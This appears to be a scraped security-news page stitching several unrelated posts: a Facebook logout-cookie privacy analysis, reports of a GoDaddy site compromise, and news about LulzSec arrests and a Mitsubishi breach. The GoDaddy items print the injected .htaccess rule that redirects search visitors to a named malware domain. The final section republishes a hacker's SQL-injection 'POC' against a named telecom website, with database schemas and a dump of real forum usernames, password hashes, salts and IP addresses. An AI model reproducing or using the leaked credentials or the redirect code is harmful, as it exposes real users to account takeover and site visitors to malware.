The advice is to log out of Facebook. But logging out of Facebook only de-authorizes your browser from the web application, a number of cookies (including your account number) are still sent along to all requests tofacebook.comEven if you are logged out, Facebook still knows and can track every page you visit. The only solution is to delete every Facebook cookie in your browser, or to use a separate browser for Facebook interactions.
Here is what is happening, as viewed by the HTTP headers on requests to facebook.com. First, a normal request to the web interface as a logged in user sends the following cookies:
Note: I have both fudged the values of each cookie and added line wraps for legibility
Cookie:
datr=tdnZTOt21HOTpRkRzS-6tjKP; 
lu=ggIZeheqTLbjoZ5Wgg; 
openid_p=101045999; 
c_user=500011111; 
sct=1316000000; 
xs=2%3A99105e8977f92ec58696cf73dd4a32f7; 
act=1311234574586%2F0
The request to the logout function will then see this response from the server, which is attempting to unset the following cookies:
Set-Cookie:
_e_fUJO_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
c_user=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
fl=1; path=/; domain=.facebook.com; httponly
L=2; path=/; domain=.facebook.com; httponly
locale=en_US; expires=Sun, 02-Oct-2011 07:52:33 GMT; path=/; domain=.facebook.com
lu=ggIZeheqTLbjoZ5Wgg; expires=Tue, 24-Sep-2013 07:52:33 GMT; path=/; domain=.facebook.com; httponly
s=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
sct=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=1316000000; path=/; domain=.facebook.com
xs=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
To make it easier to see the cookies being unset, the names are in italics. If you compare the cookies that have been set in a logged in request, and compare them to the cookies that are being unset in the logout request, you will quickly see that there are a number of cookies that are not being deleted, and there are two cookies (locale and lu) that are only being given new expiry dates, and three new cookies (WflL) being set.
Now I make a subsequent request to facebook.com as a 'logged out' user:
Cookie:
datr=tdnZTOt21HOTpRkRzS-6tjKP; 
openid_p=101045999; 
act=1311234574586%2F0; 
L=2; 
locale=en_US; 
lu=ggIZeheqTLbjoZ5Wgg; 
lsd=IkRq1; 
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Findex.php%3Flh%3Dbf0ed2e54fbcad0baaaaa32f88152%26eu%3DJhvyCGewZ3n_VN7xw1BvUw; 
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Findex.php%3Flh%3Dbf0ed2e54fbcad0b1aaaaa152%26eu%3DJhvyCGewZ3n_VN7xw1BvUw
The primary cookies that identify me as a user are still there (act is my account number), even though I am looking at a logged out page. Logged out requests still send nine different cookies, including the most important cookies that identify you as a user
This is not what 'logout' is supposed to mean - Facebook are only altering the state of the cookies instead of removing all of them when a user logs out.
With my browser logged out of Facebook, whenever I visit any page with a Facebook like button, or share button, or any other widget, the information, including my account ID, is still being sent to Facebook. The only solution to Facebook not knowing who you are is to delete all Facebook cookies.
You can test this for yourself using any browser with developer tools installed. It is all hidden in plain sight.

An Experiment

This brings me back to a story that I have yet to tell. A year ago I was screwing around with multiple Facebook accounts as part of some development work. I created a number of fake Facebook accounts after logging out of my browser. After using the fake accounts for some time, I found that they were suggesting my real account to me as a friend. Somehow Facebook knew that we were all coming from the same browser, even though I had logged out.
There are serious implications if you are using Facebook from a public terminal. If you login on a public terminal and then hit 'logout', you are still leaving behind fingerprints of having been logged in. As far as I can tell, these fingerprints remain (in the form of cookies) until somebody explicitly deletes all the Facebook cookies for that browser. Associating an account ID with a real name is easy - as the same ID is used to identify your profile.
Facebook knows every account that has accessed Facebook from every browser and is using that information to suggest friends to you. The strength of the 'same machine' value in the algorithm that works out friends to suggest may be low, but it still happens. This is also easy to test and verify.
I reported this issue to Facebook in a detailed email and got the bounce around. I emailed somebody I knew at the company and forwarded the request to them. I never got a response. The entire process was so flaky and frustrating that I haven't bothered sending them two XSS holes that I have also found in the past year. They really need to get their shit together on reporting privacy issues, I am sure they take security issues a lot more seriously.

The Rise of Privacy Awareness

10-15 years ago when I first got into the security industry the awareness of security issues amongst users, developers and systems administrators was low. Microsoft Windows and IIS were swiss cheese in terms of security vulnerabilities. You could manually send malformed payloads to IIS 4.0 and have it crash with a stack or heap overflow, which would usually lead to a remote vulnerability.
A decade ago the entire software industry went through a reformation on awareness of security principals in administration and development. Microsoft re-trained all of their developers on buffer overflows, string formatting bugs, off-by-one bugs etc. and audited their entire code base. A number of high-profile security incidents raised awareness, and today vendors have proper security procedures, from reporting new bugs to hotfixes and secure programming principals (this wasn't just a Microsoft issue - but I had the most experience with them).
Privacy today feels like what security did 10-15 years ago - there is an awareness of the issues steadily building and blog posts from prominent technologists is helping to steamroll public consciousness. The risks around privacy today are just as serious as security leaks were then - except that there is an order of magnitude more users online and a lot more private data being shared on the web.
Facebook are front-and-center in the new privacy debate just as Microsoft were with security issues a decade ago. The question is what it will take for Facebook to address privacy issues and to give their users the tools required to manage their privacy and to implement clear policies - not pages and pages of confusing legal documentation, and 'logout' not really meaning 'logout'.

Update: Contact with Facebook

To clarify, I first emailed this issue to Facebook on the 14th of November 2010. I also copied the email to their press address to get an official response on it. I never got any response. I sent another email to Facebook, press and copied it to somebody I know at Facebook on the 12th of January 2011. Again, I got no response. I have copies of all the emails, the subject lines were very clear in terms of the importance of this issue.
I have been sitting on this for almost a year now. The renewed discussion about Facebook and privacy this weekend prompted me to write this post.

Even after you are logged out, Facebook is able to track your browser's page every time you visit a website. He wrote in his blog 'With my browser logged out of Facebook, whenever I visit any page with a Facebook like button, or share button, or any other widget, the information, including my account ID, is still being sent to Facebook.'

After explaining the cookies behavior he also suggested a way to fix the tracking problem: 'The only solution to Facebook not knowing who you are is to delete all Facebook cookies.'

[...]

Continue



Hundreds of Go Daddy sites were compromised to point towards a site hosting malware last weekend. The mass hack of around 445 sites involved the injection of hostile code into the .htaccess files of the sites. 
Code:-
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L] 
Go Daddy quickly removed the hostile code before working with its customers to take back full control of the sites, which were reportedly compromised by a password hack.
Go Daddy’s chief information security officer, Todd Redfoot, told Domain Name Wire: "The accounts were accessed using the account holder’s username and password.”
It's unclear how the passwords needed to pull off the attack were obtained, but some sort of targeted phishing attack is one likely explanation. Go Daddy's investigation into the attack continues but Redfoot suggested the blame for the mass hack was outside Go Daddy's control.
"This was not an infrastructure breakdown and should not impact additional customers," he said.
Web security monitoring firm Securi warned of the mass hack on Thursday. Its blog post about the attack suggests the malicious code was targeted towards surfers visiting the affected domains via Google or other search engines rather than those who had arrived directly. Such trickery is often part and parcel of search engine manipulation attacks designed to redirect surfers hunting for content related to items in the news towards scareware portals. This kind of trickery often takes advantage of insecure WordPress installations and the like, so the apparent use of password-snaffling trickery in this case suggests the bad guys are becoming more aggressive in their hunt for sites they can abuse for their own malicious ends.

-News Source (Register)
[...]

Continue


Singapore will setup National Cyber Security Centre
Singapore has said it will boost its national capability to counter cyber security threats through the setting up of a 'National Cyber Security Centre' in the coming months. The Centre, which will be headed by the Singapore Infocomm Technology Security Authority, will help the government deal more effectively with cyber security threats and vulnerabilities by enhancing capabilities in early detection and prevention, Deputy Prime Minister Teo Chee Hean said.

In his address at the Second Singapore Global Dialogue here yesterday, Teo, who is also coordinating minister for national security and home affairs minister, said a safe and functioning cyberspace was critical to "our society, economy and national security."
[...]

Continue


FBI Arrests Shevantha Perera Suspected as LulzSec and Anonymous Hacker
Search warrants were also being executed in New Jersey, Minnesota and Montana. The FBI  arrested two alleged members of the hacking collectives LulzSec and Anonymous on Thursday morning in San Francisco and Phoenix, According to Fox news. The suspected hacker arrested in California is homeless and alleged to have been involved in the hacking of Santa Cruz County government websites.


The person arrested in Arizona is a student at a technical university and allegedly participated in the widely publicized hack against Sony. Both groups have been targeted by the FBI and international law enforcement agencies in recent months.

Meanwhile, the FBI arrested an alleged Anonymous member in San Francisco. The man, who is reported to be homeless, is said to have been involved in internet attacks against Santa Cruz County government websites.Just because a man is homeless, of course, doesn't mean that he can't get an internet connection. Coffee houses, cafes, libraries, etc can all offer cheap or free internet access - and because the computer being used can be a shared device, it may be harder to identify who might have been responsible for an attack compared to a PC at a home.

The arrests shouldn't surprise anyone. They made two errors:
Mistake #1: They brough too much attention to themselves.
It is said that John Gotti, the mafia boss, brought so much attention to himself that he became a natural, high profile target for law enforcement. As Amichai Shulman, our CTO, stated before, the Lulzsec, the hackers "were extremely unfocused in their goal and gained attention mainly due to the relative intensity of their activity and lack of other good media topics." They brought too much attention to themselves and you could expect law enforcement to find them. If you look at hacking historically, over the past 20 years many of the high-profile attacks or those that involve serious losses to governments or commercial companies have ended up with law enforcement finding the perpetrators eventually, such as Albert Gonzalez.

Mistake #2: They didn't cover up their tracks.
Let's review some of the Lulzsec chat logs from a few months ago. One snippet, in reference to discussions Lulzsec was having with the media, shows how the hackers themselves admit they gave away too much informaiton:
Topiary - Sabu and I got a bit carried away and gave LulzSec away a bit
As Imperva's Tal Be'ery said in this USA Today article, "When you're running this kind of operation for a long time, especially with not very concrete plans, you're bound to make mistakes." The mistakes Lulzsec and Anonymous made during their hacking spree left an electronic trail with enough foot prints to product today's arrests.
[...]

Continue

Lulzsec Hacker tracked by Proxy logs, can face 15 years prison
The FBI believes that the homeless man they arrested on Thursday was "Commander X", a member of the People's Liberation Front (PLF) associated with Anonymous hacktivism.

The logs maintained by HideMyAss.com, in addition to other evidence, has led to the arrest of another LulzSec member in Arizona, The Tech Herald has learned. Cody Kretsinger, 23, allegedly used the anonymity service during his role in the attack on Sony Pictures.

According to HideMyAss.com, “…services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities.” The service stores logs for 30-days when it comes to Website proxy services, and they store the connecting IP address, as well as time stamps for those using the VPN offerings. Emails seeking comment on HideMyAss.com’s level of cooperation with the FBI, as well as to confirm what information was made available, were not returned.

According to a CBS News report, "Commander X" told their reporter that he had no fear about being caught:"We're not going to turn ourselves in. They can come and get us is what I say. Bring it on. Until then, we run... We will remain free and at liberty and at large for as long as we can, and when the time comes that each and every one of us eventually will be brought to justice, we will hold our head high in any court of law and we will defend our actions."

He faces a maximum sentence of 15 years in prison if convicted. Government prosecutors want him moved to Los Angeles, where Sony Pictures' computer system is located and where the case against him has been filed.
[...]

Continue


FBI Arrests Suspected LulzSec and Anonymous Hackers
Search warrants were also being executed in New Jersey, Minnesota and Montana. The FBI  arrested two alleged members of the hacking collectives LulzSec and Anonymous on Thursday morning in San Francisco and Phoenix, According to Fox news. The suspected hacker arrested in California is homeless and alleged to have been involved in the hacking of Santa Cruz County government websites.


The person arrested in Arizona is a student at a technical university and allegedly participated in the widely publicized hack against Sony. Both groups have been targeted by the FBI and international law enforcement agencies in recent months.

Meanwhile, the FBI arrested an alleged Anonymous member in San Francisco. The man, who is reported to be homeless, is said to have been involved in internet attacks against Santa Cruz County government websites.Just because a man is homeless, of course, doesn't mean that he can't get an internet connection. Coffee houses, cafes, libraries, etc can all offer cheap or free internet access - and because the computer being used can be a shared device, it may be harder to identify who might have been responsible for an attack compared to a PC at a home.

The arrests shouldn't surprise anyone. They made two errors:
Mistake #1: They brough too much attention to themselves.
It is said that John Gotti, the mafia boss, brought so much attention to himself that he became a natural, high profile target for law enforcement. As Amichai Shulman, our CTO, stated before, the Lulzsec, the hackers "were extremely unfocused in their goal and gained attention mainly due to the relative intensity of their activity and lack of other good media topics." They brought too much attention to themselves and you could expect law enforcement to find them. If you look at hacking historically, over the past 20 years many of the high-profile attacks or those that involve serious losses to governments or commercial companies have ended up with law enforcement finding the perpetrators eventually, such as Albert Gonzalez.

Mistake #2: They didn't cover up their tracks.
Let's review some of the Lulzsec chat logs from a few months ago. One snippet, in reference to discussions Lulzsec was having with the media, shows how the hackers themselves admit they gave away too much informaiton:
Topiary - Sabu and I got a bit carried away and gave LulzSec away a bit
As Imperva's Tal Be'ery said in this USA Today article, "When you're running this kind of operation for a long time, especially with not very concrete plans, you're bound to make mistakes." The mistakes Lulzsec and Anonymous made during their hacking spree left an electronic trail with enough foot prints to product today's arrests.
[...]

Continue



Mitsubishi Heavy Industries, Japan's biggest defense contractor, has revealed that it suffered a hacker attack in August that caused some of its networks to be infected by malware. The firm - which is involved in a wide range of activities including space rockets, the production of jet fighters, shipbuilding, and running nuclear power plants - said that 45 network servers and 38 PCs became infected with malware at ten facilities across Japan.
The infected sites included its submarine manufacturing plant in Kobe and the Nagoya Guidance & Propulsion System Works, which makes engine parts for missiles.
The Japanese newspaper Yomiuri claimed that at least eight different pieces of malware, including some which stole data, were discovered at Mitsubishi sites. A Mitsubishi spokesperson, however, was quoted as saying that "there is no possibility of any leakage of defense-related information at this point."
The company first noticed the attack on August 11th, and expects to have the results of an investigation into the security breach by the end of September.
If Mitsubishi Heavy Industries was targeted by hackers, the obvious question to ask is who was behind the attack and what was the motive?

-News Source (NS)
[...]

Continue


GoDaddy websites Compromised with Malware
Many sites hosted on GoDaddy shared servers getting compromised today  with a conditional redirection tosokoloperkovuskeci.com.In all 445 cases the .htaccess file (a main Apache web server configuration file) was modified to redirect users to a malware site when they were referred by one of a list of search engines. These redirections attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy hosted sites. So it looks like a compromise on their own servers (similar to what has happened in the past).
This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

The malware checks if anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and if they are, redirects them to that domain (sokoloperkovuskeci.com). In there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users. GoDaddy says they are working with customers to resolve the issue, but if you have a GoDaddy account you should check on this, minimally by Googling for your site and following the link (only if your browser is all patched up and you have sufficient other protections).DomainNameWire also smartly recommends that you check with Google, other search engines and security companies to make sure you haven't been blacklisted.
[...]

Continue



Official website of WorldCall Telecom No. 1 telecom company is Pakistan is vulnerable to SQL-i. This vulnerability has been found by bLaCk t3arS and he also hacked the Database of that website. The hacker exposed secrete credentials like DB name, tables, columns, online user details with user-name, email-id, login IP address. Also the adim details get exposed.

Website:-

Screen shot Submitted By the Hacker:-

 the hacked DB and leaked informations

Official website of WorldCall Telecom No. 1 telecom company is Pakistan is vulnerable to SQL-i. This vulnerability has been found by bLaCk t3arS and he also hacked the Database of that website. The hacker exposed secrete credentials like DB name, tables, columns, online user details with user-name, email-id, login IP address. Also the adim details get exposed. 


Website: http://www.worldcall.net.pk/

POC:

Database Name: new_portal_2008 

Table Name Columns 
===================
change_package_corp_khi  
change_package_corp_lah  
change_package_home_khi  
change_package_home_lah  
change_pkg_request  
channel_list  
chat  
city  
city_vs_services  
complaint_form  
complaint_form_catv_khi  
complaint_form_catv_lah  
complaint_form_dtv_khi  
complaint_form_dtv_lah  
complaint_form_ioc_khi  
complaint_form_ioc_lah  
complaint_form_vod_khi  
complaint_form_vod_lah  
complaint_form_voip_khi  
contact_us  
customer_information  
customer_service_center  
disconnection_request_catv_khi  
disconnection_request_catv_lah  
disconnection_request_ioc_khi  
disconnection_request_ioc_lah  
disconnection_request_vod_khi  
disconnection_request_vod_lah  
disconnection_request_voip_khi  
email_conn  
evdo_win_form  
evod_contact_us  
faq_category  
faq_question  
hor_star  
links_main  
new_connection  
new_connection_corp_khi_id  
new_connection_corp_lah_id  
new_connection_khi  
new_connection_lah  
news_report  
service_speed  
services  
survey  
transaction_information  
userid  
we_schedule_data  
we_schedule_time  
weather  
web_resume  

Database Name: forum 

Table Name Columns 
===================
access  
action  
ad  
adcriteria  
adminhelp  
administrator  
adminlog  
adminmessage  
adminutil  
adv_modules  
adv_pages  
adv_pages_user  
adv_setting  
adv_settinggroup  
album  
albumupdate  
announcement  
announcementread  
attachment  
attachmentcategory  
attachmentcategoryuser  
attachmentpermission  
attachmenttype  
attachmentviews  
attachmentviewslog  
avatar  
award  
award_cat  
award_user  
badwords  
bbcode  
bbcode_video  
block  
blockconfig  
blocktype  
blog  
blog_attachment  
blog_attachmentviews  
blog_category  
blog_categorypermission  
blog_categoryuser  
blog_custom_block  
blog_custom_block_parsed  
blog_deletionlog  
blog_editlog  
blog_featured  
blog_groupmembership  
blog_grouppermission  
blog_hash  
blog_moderation  
blog_moderator  
blog_pinghistory  
blog_rate  
blog_read  
blog_relationship  
blog_search  
blog_searchresult  
blog_subscribeentry  
blog_subscribeuser  
blog_summarystats  
blog_tachyentry  
blog_text  
blog_textparsed  
blog_trackback  
blog_trackbacklog  
blog_user  
blog_usercss  
blog_usercsscache  
blog_userread  
blog_userstats  
blog_views  
blog_visitor  
bookmarksite  
cache  
cacheevent  
calendar  
calendarcustomfield  
calendarmoderator  
calendarpermission  
cms_article  
cms_category  
cms_grid  
cms_layout  
cms_layoutwidget  
cms_navigation  
cms_node  
cms_nodecategory  
cms_nodeconfig  
cms_nodeinfo  
cms_permissions  
cms_rate  
cms_sectionorder  
cms_widget  
cms_widgetconfig  
cms_widgettype  
contentpriority  
contenttype  
cpsession  
cron  
cronlog  
customavatar  
customprofilepic  
datastore  
dbtech_vbactivity_rewards  
deletionlog  
discussion  
discussionread  
editlog  
event  
externalcache  
faq  
fbb_invited  
fbb_log  
filedata  
forum  
forumpermission  
forumprefixset  
forumread  
games_cats  
games_champs  
games_league  
games_list  
games_savedGames  
games_scores  
games_session  
games_settings  
groupmessage  
groupmessage_hash  
groupread  
guest  
guestviews  
holiday  
humanverify  
hvanswer  
hvquestion  
icon  
imagecategory  
imagecategorypermission  
indexqueue  
infraction  
infractionban  
infractiongroup  
infractionlevel  
invites  
itrader  
itrader_comments  
language  
macro  
mailqueue  
microclassifieds_categories  
microclassifieds_item_files  
microclassifieds_item_hits  
microclassifieds_item_payments  
microclassifieds_item_photos  
microclassifieds_item_shipping  
microclassifieds_items  
microsupport_categories  
microsupport_departments  
microsupport_faq  
microsupport_products  
microsupport_ticket_replies  
microsupport_ticket_status  
microsupport_tickets  
moderation  
moderator  
moderatorlog  
noinvite  
notice  
noticecriteria  
noticedismissed  
package  
passwordhistory  
paymentapi  
paymentinfo  
paymenttransaction  
phrase  
phrasetype  
picturecomment  
picturecomment_hash  
picturelegacy  
plugin  
pm  
pmreceipt  
pmtext  
pmthrottle  
podcast  
podcastitem  
poll  
pollvote  
post  
postedithistory  
posthash  
postlog  
postparsed  
prefix  
prefixpermission  
prefixset  
product  
productcode  
productdependency  
profileblockprivacy  
profilefield  
profilefieldcategory  
profilevisitor  
ranks  
reminder  
reputation  
reputationlevel  
route  
rssfeed  
rsslog  
searchcore  
searchcore_text  
searchgroup  
searchgroup_text  
searchlog  
session  
setting  
settinggroup  
sigparsed  
sigpic  
smilie  
socialgroup  
socialgroupcategory  
socialgroupicon  
socialgroupmember  
spamlog  
stats  
strikes  
style  
stylevar  
stylevardfn  
subscribediscussion  
subscribeevent  
subscribeforum  
subscribegroup  
subscribethread  
subscription  
subscriptionlog  
subscriptionpermission  
tachyforumcounter  
tachyforumpost  
tachythreadcounter  
tachythreadpost  
tag  
tagcontent  
tagsearch  
template  
templatehistory  
templatemerge  
thread  
threadrate  
threadread  
threadredirect  
threadviews  
tournament_players  
tournament_players_statut  
tournaments  
upgradelog  
user  
useractivation  
userban  
userchangelog  
usercss  
usercsscache  
userfield  
usergroup  
usergroupleader  
usergrouprequest  
userlist  
usernote  
userpromotion  
usertextfield  
usertitle  
visitormessage  
visitormessage_hash  
vsa_advreg  
vsa_advreg_invite  
vsa_birthdaythread  
vsa_chatbox  
vsa_frules  
whoread  

Database Name: mint_stat

Table Name Columns 
===================
mint__config  
mint_geo  
mint_hostnames  
mint_outbound  
mint_readership  
mint_seeds  
mint_visit  

Database Name: mysql 

Table Name Columns 
===================
columns_priv  
db  
func  
help_category  
help_keyword  
help_relation  
help_topic  
host  
proc  
procs_priv  
tables_priv  
time_zone  
time_zone_leap_second  
time_zone_name  
time_zone_transition  
time_zone_transition_type  
user  


Database Name: vbb 

Table Name Columns 
===================
access  
adminhelp  
administrator  
adminlog  
adminutil  
announcement  
attachment  
attachmenttype  
attachmentviews  
avatar  
bbcode  
calendar  
calendarcustomfield  
calendarmoderator  
calendarpermission  
cpsession  
cron  
cronlog  
customavatar  
customprofilepic  
datastore  
deletionlog  
editlog  
event  
faq  
forum  
forumpermission  
forumread  
holiday  
icon  
imagecategory  
imagecategorypermission  
language  
mailqueue  
moderation  
moderator  
moderatorlog  
passwordhistory  
paymentapi  
paymentinfo  
paymenttransaction  
phrase  
phrasetype  
plugin  
pm  
pmreceipt  
pmtext  
poll  
pollvote  
post  
post_parsed  
posthash  
postindex  
product  
productcode  
profilefield  
ranks  
regimage  
reminder  
reputation  
reputationlevel  
search  
session  
setting  
settinggroup  
smilie  
stats  
strikes  
style  
subscribeevent  
subscribeforum  
subscribethread  
subscription  
subscriptionlog  
tachyforumpost  
tachythreadpost  
template  
templatehistory  
thread  
threadrate  
threadread  
threadviews  
upgradelog  
user  
useractivation  
userban  
userfield  
usergroup  
usergroupleader  
usergrouprequest  
usernote  
userpromotion  
usertextfield  
usertitle  
word

Database Dumps
==============
Database: forum
Table: user

username password ipaddress salt
============== ===================================    =================               ========
Administrator acf2ea8261d2c48899cf80887317e1e4   f,{ 
shmaitlo 6bf89cb8c86aaaa22e929daac106fc13 203.81.204.45 z<& 
d3v!l d7d830133351096b31dff735693d99df 203.81.204.45 G'x 
aiqbal 68a84af3ba20b4c2a3ec2ab5c2533adf 203.81.204.54 ;iz 
iashaikh 4e8baf55c052a38a6f092b832812cb64   #4_ 
krkonline 299f06aa345bc683238ddfecaafea64c   /mk 
shadow 56d80297f0eb20782f358f7d7ebad616   BXZ 
NiGhTmArE 5122ddea4dbf8a06bdfb1c3aa017ded2   _`2 
Deafbeat 68ca9a08ea03d4cac96b17ce7c1e6c21   4B@ 
uzmank 5154feb99761f577efe70fd1e31df790   s!= 
nauman f013123c9ea273e606071d0da7bd77f1   \2q 
d3v 4efcc4bda34aee7b694f4fbb5611e154   PC{ 
-StonE-* 1399020d956c3aaa5a1efc3bdebf9dca   g<O 
MrHot2000 723f709f7b3eaa91008cec2138049ab0   ";V 
ishfaq.316 0f1cd5c603fb5612b5255cbe234476d8   ]fd 
OptimusSS 0800c893e2a9a30b7083b75848465484   o|C 
Setsuna.F.Seiei f449b1399495301aceea6e105b1186e8   \~l 
mhthanvi 1de8417164292236cda29de180a7d0d8   9J/ 
sangani aa59b857b928133a267a36a6686a96d6   nt~ 
moizmarvi ef26cb50ac58cd402a8482e64471b132   zd! 
Derby a41fbbabd5d227554c2c7adced821e56   Pm7 
jazzy 6eda8372852e785717a73a8eaf290dfb   w"S 
Sid 99acecea9754510bd9ed162328d6f2d2   G"{ 
waqasahmed b436adc6398ffee30e2c162ec960de2f   uPt 
Salman 789e553f32a2900f9adef67c308062aa   [)n 
Muhammad Haisam 07391d05194ea8c70ac4c87938f9d958   `3B 
SohaibArif 3c3647bb750e5b8ae0819322fdaba526   A*$ 
khurr d4f0b932f89d9c07e5ef773a696d4581   O:6 
efroz 3544fda2ada57e53bf713d1d06496330   #i/ 
rbiasdevil 9f72dbc526ed18c4ec18aabed7ac058e   bTJ 
Lapd 0915231dcfefe58dc3a91d0ef519cec3   IH. 
hitman1986 b9d05e41361b6f86f4b398bed784798c   N3F 
(dub) 63fef98c2df5d243c47e845b0297fba3   a%p 
forumpolice 2ea65d7eb1f21b31bd5154a13e3f7482 203.81.204.45 F{L 
aftab.qureshi f2a34d4771f58adf50fc10ea004afb7c 203.81.204.45 xK! 
mmohsin 9032721a1c850d57ec00f901d165e171 203.81.204.45 "0z 
riaz.rehman 6506ff8d47284d270fea664bf89e5866 203.81.204.45 >*t 
Dusk 963f2c61ced60c42afb19db6172b90ac 117.102.34.81 |k+ 
M.Usman 0a300f91f4dbb92748ae01ea16785816 115.186.115.48 JKK 
shiii 73906573e11f0ad8865868fb8ab8b48b 119.152.27.54 U%m 
fazli007 e6d2230fca8bbf1f6d59519b298dfeca 117.102.16.186 W*, 
shahbaz.ali e1f52b7b96788bf1f6f64b080bc1b997 203.81.204.13 u$l 
aarsalan 9cdc219b7728a085178ba3b9b3420e54 115.186.118.219 nHx 
dub 13022bebe85a73fa0167486d916314a9 115.186.123.239 fF{ 
ParadoX e463a5e259f3d6a204d13d1d59a83637 59.103.203.87 W8b 
anjumnisar 7c48d952291026188a46ba1e0da1b1ad 203.81.207.195 A04 
Arif_Sohaib cc76c31bb01244956fcaed3926461a44 203.81.214.66
maitloayaz 0758f954e30b9cf076c979b8297773b5 119.155.10.119 G4B 
jshak b23ab9204553e13f9a26c1427426d038 116.71.14.222 Hmj 
SalmanslK 5c4bb19e3137c514e77c59cdc40f6cc8 115.186.124.28 Hud 
MehdiX 327b0b8cc4b799280928bc191111b5c6 115.186.112.144 -0% 
fahad 3db38465ecad9a34cb6707a48f05f55d 203.81.231.178 7s} 
mianali 3b4e4c77bb7208352bfe87cd8d0273b9 117.102.39.234 ;rd 
timmmu 930571ba4e2118cc0f5864a6346cfe61 115.167.108.47 _x+ 
testing 3fc673bbcf69fafce3fa068a922f12af 203.81.204.54 =rK 
Moheet c71e32a82968e75d70abd950fafb9f0e 119.155.67.75 XlT 
brainz fa7ff31d857aa5de87de96a2f7102157 119.155.1.62 o|e 
alikhalid345 e06be5e49f0776854e479854494703b4 119.73.42.207 G<5 
alismarty 891e2b6775efab2d954f448a0fc21ce5 115.186.72.235 _Q0 
alisultan216 ef481611c43311d303727b0d92e78471 117.102.37.179 "g3 
ali_shah142005 5c8e4e466a3e5cc7b59186bdb1b1d864 115.186.122.209 :!o 
Alvertoseo 20fe43c7bb7ddcbaad497da49891910d 217.132.248.198 EU_ 
Aman 46a9dcf650e5231eaf77ac8e984319c2 115.186.75.119 xN# 
Amara 9d67ce250d50ff67e451a7852bd7f3a6 115.186.21.69 Tp: 
amir 1a34c30cc5e51046f0500eaf4d80c2d0 115.186.123.181 z2( 
amir2010 435d5d449f575c5f4975642437eb9000 203.81.204.54 '2V 
ammarqadeer 2a24469747ca73dc819c7c159361d947 115.186.64.210 }PV 
ammarqadeer-45 ff4979445639df5251084bb7a7f574a8 115.186.71.194 y1q 
amy.roxx28 3a950cb9de9d991f4045eb0b1cbebb09 115.186.71.220 MJ' 
Anas 4a851ba9e20a43075059a52f9637670f 115.186.113.218 dLt 
AndrewFVT 01b07121096bc4c39c6e6d444aa188b2 94.181.166.27 }Gz 
AngelaMueller bb69a7ec98828004553a89491213bbfe 203.87.201.210 GL! 
anjumnisar 7c48d952291026188a46ba1e0da1b1ad 203.81.207.195 A04 
Anthrax a2106b6e6a690221ec20abde8c35e7ac 115.186.28.7 gRZ 
Anthrax1996 7f9284914b1cd9b6c9e6fad3416513e3 115.186.71.69 s!e 
ApetBrepayBut aff7be3def1a50d554a78e0dcdc3a12e 91.201.66.145 Jd# 
apexbiz 7e8b2be61868362a32417747b726b434 119.152.32.255 W}, 
aqib89 034f309c66a73ab23a3733bc700c1a23 203.81.202.209 xt' 
aragog14 fe1189d879fc5706630b7626f148cc7b 119.157.72.67 dbT 
architectavg 50f3991ec06c6c79d18f9ed8a4eda78a 115.186.7.23 ($@ 
arfansheikh bb4fe6590f3ac72c8e63f3237ad2b17f 115.186.17.26 Ktf 
arifh eae8a18206c13c886411b317efa351c5 203.81.208.106 s+8 
arifmaham d43447275a35710cf286efeddc477f70 203.81.202.117 fM" 
Arif_Sohaib cc76c31bb01244956fcaed3926461a44 203.81.214.66 `^! 
aroma_saba 5a4bc06bdd7272d541db8d1f408b35d8 115.186.65.150 0wA 
Arranounmab d0fc2856047b3c41d6019cfbc5321ab1 217.165.220.137 ?|J 
arsalan345 e02d34b0d2270ca275ff7cbc61c42b0f 115.186.123.225 =p{ 
arsalan660 27d6e9c864fcaf0d19e30856c3ea1b33 117.102.35.237 z@e 
arshadwtn e2a4f349892e04f764820ffe6766c8e0 115.186.21.164 #TJ 
arsi128 7620113901f7a92a680246da018b1a7e 115.186.111.97 5lH 
arslankhan 7114cfc556ebffc8fbe354ab9119a9c1 182.177.144.28 mZ$ 
asadiqbal 60523333d85a19a92f181b370c8512fc 119.152.137.140 g#> 
asadsads 3ba9c3387fb6f808cba09eaea798f084 115.186.122.12 uIP 
asdogar 1d5203880249c417350102c59df078d3 115.186.6.189 Aq`
asif 0ca687199582c97e50a84d7313042575 115.186.66.74 @// 
